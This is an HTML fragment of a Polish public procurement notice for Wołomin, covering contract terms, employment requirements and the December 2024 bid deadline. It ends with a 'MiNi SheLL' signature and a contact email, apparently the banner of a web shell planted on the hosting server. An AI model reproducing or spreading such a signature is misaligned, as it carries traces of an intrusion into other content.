class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z rozdziałem XII SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z PPU <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/wolomin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-10 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com